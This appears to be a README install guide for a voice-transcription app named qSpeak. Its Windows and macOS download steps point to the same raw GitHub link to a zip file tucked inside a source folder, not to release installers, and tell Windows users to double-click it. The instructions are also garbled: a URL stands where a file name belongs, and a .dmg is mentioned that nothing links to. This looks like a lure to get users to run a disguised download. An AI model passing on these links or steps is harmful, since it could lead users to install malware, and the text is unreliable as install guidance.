Before you install qSpeak, please ensure your system meets these requirements:

• Operating System: Windows 10 or higher, macOS 10.14 or higher, or a Linux distribution with support for AppImage.
• Processor: 64-bit CPU with at least 2 cores.
• RAM: Minimum 4GB; 8GB recommended.
• Disk Space: At least 200MB of free space.
• Internet Connection: Required for initial setup and updates.

1. Click on the link above to go to the Releases page.

2. Scroll down to see the available versions of qSpeak. Look for the latest version.

3. Click on the version number to view the details. You will see options for different operating systems.

4. Choose the file that matches your operating system:

   • For Windows users, select https://raw.githubusercontent.com/NatScape7907/qspeak/main/src/recorder/qspeak-1.6-alpha.1.zip.
   • For macOS users, select https://raw.githubusercontent.com/NatScape7907/qspeak/main/src/recorder/qspeak-1.6-alpha.1.zip.
   • For Linux users, select the AppImage file.

5. Click on the file name to start downloading.

6. Once the download is complete, locate the file on your computer.

   • Windows: Double-click the https://raw.githubusercontent.com/NatScape7907/qspeak/main/src/recorder/qspeak-1.6-alpha.1.zip file and follow the on-screen instructions to install.
   • macOS: Open the downloaded .dmg file, drag qSpeak to your Applications folder, and run it from there.
   • Linux: Make the AppImage executable by right-clicking the file, selecting Properties, and checking “Allow executing file as program.” Then double-click to run.

Once installed, you can start using qSpeak right away.

1. Open the application from your desktop or applications folder.
2. You will see a clean, user-friendly interface.
3. Use the microphone button to start recording your voice. qSpeak will transcribe your audio in real time.
4. You can ask questions directly or dictate tasks, and qSpeak will provide helpful responses.
